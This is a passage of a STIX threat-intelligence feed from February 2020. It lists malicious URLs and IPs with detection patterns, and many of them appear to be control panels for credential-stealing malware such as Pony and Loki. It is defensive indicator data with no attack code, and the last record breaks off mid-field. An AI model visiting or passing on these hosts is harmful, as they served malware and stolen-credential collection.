+{"created":"2020-02-21T02:53:40.48Z","description":"TS ID: 55333174451; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--51994ab0-1f97-4bcb-9f24-9fcd3d2364aa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-02-21T02:53:40.48Z","name":"mal_url: http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://zdwallcoveing.com/clock/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-21T02:53:40.48Z"} +{"created":"2020-02-21T02:53:42.327Z","description":"TS ID: 55333174456; iType: mal_url; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--c9d733d6-25c7-4306-9246-c08194e3073a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-21T02:53:42.327Z","name":"mal_url: http://livdecor.pt/ali/Panel/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://livdecor.pt/ali/Panel/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:53:42.327Z"} +{"created":"2020-02-21T02:53:58.967Z","description":"TS ID: 55333174444; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime","id":"indicator--1322e66c-185d-4f46-80d4-d5751722d4cf","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-21T02:53:58.967Z","name":"mal_url: http://liweff.eu/kp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://liweff.eu/kp/login.php']","type":"indicator","valid_from":"2020-02-21T02:53:58.967Z"} +{"created":"2020-02-21T02:54:44.049Z","description":"TS ID: 55333174436; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--733d93ce-6ce8-4272-b564-b09818dbdbbb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-20"],"modified":"2020-02-21T02:54:44.049Z","name":"mal_url: http://82.165.18.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://82.165.18.207/panel/admin.php']","type":"indicator","valid_from":"2020-02-21T02:54:44.049Z"} +{"created":"2020-02-21T02:54:44.075Z","description":"TS ID: 55333174435; iType: mal_ip; State: active; Org: WebHS; Source: CyberCrime","id":"indicator--fc0b39d5-d097-4e61-a4cd-970929467bad","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-02-21T02:54:44.075Z","name":"mal_ip: 185.90.59.42","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.90.59.42']","type":"indicator","valid_from":"2020-02-21T02:54:44.075Z"} +{"created":"2020-02-22T02:52:52.6Z","description":"TS ID: 55335562485; iType: mal_url; State: active; Org: PDR; Source: CyberCrime","id":"indicator--92dd4ff2-7072-4262-b47d-b04cae8480e1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-22T02:52:52.6Z","name":"mal_url: http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://missingandfound.com.my/urch/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:52.6Z"} +{"created":"2020-02-22T02:52:53.322Z","description":"TS ID: 55335562462; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--122f6e46-781f-4d00-8247-6cf4047b0c9f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:52:53.322Z","name":"mal_url: http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://corpcougar.com/bin/pa/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.322Z"} +{"created":"2020-02-22T02:52:53.756Z","description":"TS ID: 55335562495; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--d5b42516-dfa2-499d-bc2b-c5c10617e7c9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:52:53.756Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.756Z"} +{"created":"2020-02-22T02:52:53.779Z","description":"TS ID: 55335562482; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--0668db3a-adb5-4e2e-b8f2-18e3870e2d7c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:53.779Z","name":"mal_url: http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://rotan.tech/explore/acm/balldrop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:52:53.779Z"} +{"created":"2020-02-22T02:52:59.853Z","description":"TS ID: 55335562401; iType: mal_url; State: active; Org: BelCloud Hosting Corporation; Source: CyberCrime","id":"indicator--679fd604-82cb-47cd-a968-e87e9cca7fac","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-22T02:52:59.853Z","name":"mal_url: http://86.106.93.103/mpdu/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://86.106.93.103/mpdu/index.php']","type":"indicator","valid_from":"2020-02-22T02:52:59.853Z"} +{"created":"2020-02-22T02:53:10.018Z","description":"TS ID: 55335562492; iType: mal_ip; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--cdbffa12-c6c9-4723-807f-46b9672a23a2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-02-22T02:53:10.018Z","name":"mal_ip: 95.142.44.87","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '95.142.44.87']","type":"indicator","valid_from":"2020-02-22T02:53:10.018Z"} +{"created":"2020-02-22T02:53:11.62Z","description":"TS ID: 55335562491; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--2218c7b6-3e94-4885-9a70-1f724d8453cc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:53:11.62Z","name":"mal_url: http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://epperfums.com/drunk/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:11.62Z"} +{"created":"2020-02-22T02:53:34.685Z","description":"TS ID: 55335562511; iType: mal_url; State: active; Org: T-Mobile Czech Republic; Source: CyberCrime","id":"indicator--773fabfe-63b5-4681-8189-4dffad1747fc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-46"],"modified":"2020-02-22T02:53:34.685Z","name":"mal_url: http://ccilfov.ro/css/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ccilfov.ro/css/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.685Z"} +{"created":"2020-02-22T02:53:34.733Z","description":"TS ID: 55335562506; iType: mal_ip; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--5e32213f-5daa-4181-a108-0fc58482adcb","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:53:34.733Z","name":"mal_ip: 66.172.27.221","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '66.172.27.221']","type":"indicator","valid_from":"2020-02-22T02:53:34.733Z"} +{"created":"2020-02-22T02:53:34.767Z","description":"TS ID: 55335562468; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--b07ae083-b56c-48b0-bfdb-6cf786978ce8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:53:34.767Z","name":"mal_url: http://nortonlilly.info/zeya/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/zeya/login.php']","type":"indicator","valid_from":"2020-02-22T02:53:34.767Z"} +{"created":"2020-02-22T02:53:36.179Z","description":"TS ID: 55335562472; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--42e0fb49-dd09-4979-a4d0-ff310d14acf8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:53:36.179Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/adaba/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/adaba/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:53:36.179Z"} +{"created":"2020-02-22T02:53:45.219Z","description":"TS ID: 55335562429; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--8d2d349a-763b-406b-ba8c-8ba684058028","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-02-22T02:53:45.219Z","name":"mal_url: http://51.83.200.179/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://51.83.200.179/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:53:45.219Z"} +{"created":"2020-02-22T02:53:56.922Z","description":"TS ID: 55335562488; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--965a2554-cc08-488c-8d81-a29e8402eec1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-92"],"modified":"2020-02-22T02:53:56.922Z","name":"mal_url: http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lighteniger.tech/hntspeed/mansft/paydy/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:53:56.922Z"} +{"created":"2020-02-22T02:54:18.93Z","description":"TS ID: 55335562502; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--e75aa726-cbb0-486f-ac25-947fc76fb5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-22T02:54:18.93Z","name":"mal_url: http://paperblank.best/gHL6qufBKIulnp11/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://paperblank.best/gHL6qufBKIulnp11/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:18.93Z"} +{"created":"2020-02-22T02:54:18.975Z","description":"TS ID: 55335562470; iType: mal_ip; State: active; Org: Alibaba.com Singapore E-Commerce Private Limited; Source: CyberCrime","id":"indicator--9f6d9425-fc79-4493-8f95-81ac2a7ae188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-56"],"modified":"2020-02-22T02:54:18.975Z","name":"mal_ip: 8.208.3.169","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '8.208.3.169']","type":"indicator","valid_from":"2020-02-22T02:54:18.975Z"} +{"created":"2020-02-22T02:54:27.432Z","description":"TS ID: 55335562494; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--1333f7e6-3af0-4aea-b798-a54f03d68ac5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:27.432Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/frega2/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/frega2/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.432Z"} +{"created":"2020-02-22T02:54:27.479Z","description":"TS ID: 55335562474; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--f4e076ed-6393-49d5-adc2-cbe730ff48db","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:27.479Z","name":"mal_url: http://castmart.ga/~zadmin/beta/herm/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://castmart.ga/~zadmin/beta/herm/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:27.479Z"} +{"created":"2020-02-22T02:54:29.634Z","description":"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime","id":"indicator--2b38be23-b226-460e-9b17-4480e930f271","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-22T02:54:29.634Z","name":"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.634Z"} +{"created":"2020-02-22T02:54:29.689Z","description":"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-22T02:54:29.689Z","name":"mal_url: http://pay-robokassa.net/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pay-robokassa.net/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:29.689Z"} +{"created":"2020-02-22T02:54:47.42Z","description":"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--a15df968-dec6-4122-811e-1144011d0653","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:47.42Z","name":"mal_url: http://nortonlilly.info/jb/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jb/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:47.42Z"} +{"created":"2020-02-22T02:54:48.824Z","description":"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime","id":"indicator--11fec449-039c-4d64-aefa-210e96074633","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-40"],"modified":"2020-02-22T02:54:48.824Z","name":"mal_url: http://185.70.185.34/host/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.70.185.34/host/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:48.824Z"} +{"created":"2020-02-22T02:54:49.84Z","description":"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:54:49.84Z","name":"mal_url: http://nortonlilly.info/ace1/st/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/ace1/st/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:49.84Z"} +{"created":"2020-02-22T02:54:51.052Z","description":"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-22T02:54:51.052Z","name":"mal_url: http://94.100.18.4/primfive/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.4/primfive/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.052Z"} +{"created":"2020-02-22T02:54:51.08Z","description":"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime","id":"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-02-22T02:54:51.08Z","name":"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']","type":"indicator","valid_from":"2020-02-22T02:54:51.08Z"} +{"created":"2020-02-22T02:54:57.998Z","description":"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-22T02:54:57.998Z","name":"mal_url: http://dronius267.myjino.ru/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://dronius267.myjino.ru/login.php']","type":"indicator","valid_from":"2020-02-22T02:54:57.998Z"} +{"created":"2020-02-22T02:54:58.082Z","description":"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-02-22T02:54:58.082Z","name":"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:54:58.082Z"} +{"created":"2020-02-22T02:54:59.268Z","description":"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-22T02:54:59.268Z","name":"mal_url: http://193.142.59.88/primsix/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.88/primsix/logs/omc.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.268Z"} +{"created":"2020-02-22T02:54:59.71Z","description":"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:54:59.71Z","name":"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:54:59.71Z"} +{"created":"2020-02-22T02:55:06.175Z","description":"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:06.175Z","name":"mal_url: http://nortonlilly.info/jp/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/jp/login.php']","type":"indicator","valid_from":"2020-02-22T02:55:06.175Z"} +{"created":"2020-02-22T02:55:16.703Z","description":"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:16.703Z","name":"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:16.703Z"} +{"created":"2020-02-22T02:55:26.13Z","description":"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-45"],"modified":"2020-02-22T02:55:26.13Z","name":"mal_url: http://67.215.224.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.144/login']","type":"indicator","valid_from":"2020-02-22T02:55:26.13Z"} +{"created":"2020-02-22T02:55:32.068Z","description":"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-02-22T02:55:32.068Z","name":"mal_url: http://abyng.com/mg/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://abyng.com/mg/panel/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:32.068Z"} +{"created":"2020-02-22T02:55:34.073Z","description":"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-22T02:55:34.073Z","name":"mal_ip: 192.64.118.182","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.182']","type":"indicator","valid_from":"2020-02-22T02:55:34.073Z"} +{"created":"2020-02-22T02:55:37.882Z","description":"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime","id":"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-02-22T02:55:37.882Z","name":"mal_ip: 185.141.24.100","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.141.24.100']","type":"indicator","valid_from":"2020-02-22T02:55:37.882Z"} +{"created":"2020-02-22T02:55:50.468Z","description":"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-22T02:55:50.468Z","name":"mal_url: http://d0lphin1337.xyz/autofarm/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']","type":"indicator","valid_from":"2020-02-22T02:55:50.468Z"} +{"created":"2020-02-22T02:55:52.759Z","description":"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-02-22T02:55:52.759Z","name":"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-22T02:55:52.759Z"} +{"created":"2020-02-23T02:51:55.106Z","description":"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime","id":"indicator--516caba2-8889-4f32-96e6-e4874a705085","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-23T02:51:55.106Z","name":"mal_url: http://94.100.18.11/plugman/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://94.100.18.11/plugman/logs/omc.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.106Z"} +{"created":"2020-02-23T02:51:55.126Z","description":"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime","id":"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-100"],"modified":"2020-02-23T02:51:55.126Z","name":"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:51:55.126Z"} +{"created":"2020-02-23T02:52:00.436Z","description":"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime","id":"indicator--015e9665-1524-4e79-841d-8038961e0250","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-23T02:52:00.436Z","name":"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:00.436Z"} +{"created":"2020-02-23T02:52:11.479Z","description":"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-23T02:52:11.479Z","name":"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:11.479Z"} +{"created":"2020-02-23T02:52:31.664Z","description":"TS ID: 55342497257; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--c48537ec-9991-441c-89e6-f41295aa8b88","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-23T02:52:31.664Z","name":"mal_url: http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:31.664Z"} +{"created":"2020-02-23T02:52:36.705Z","description":"TS ID: 55342497265; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--c580668f-1fd0-49e7-bea8-fe3effa1854a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-23T02:52:36.705Z","name":"mal_url: http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:36.705Z"} +{"created":"2020-02-23T02:52:38.725Z","description":"TS ID: 55342497253; iType: mal_url; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime","id":"indicator--97f5e99e-bdb3-4f2e-b9e6-b820f6c6e17c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-02-23T02:52:38.725Z","name":"mal_url: http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-23T02:52:38.725Z"} +{"created":"2020-02-23T02:52:43.45Z","description":"TS ID: 55342497299; iType: mal_url; State: active; Org: Cloudflare; Source: 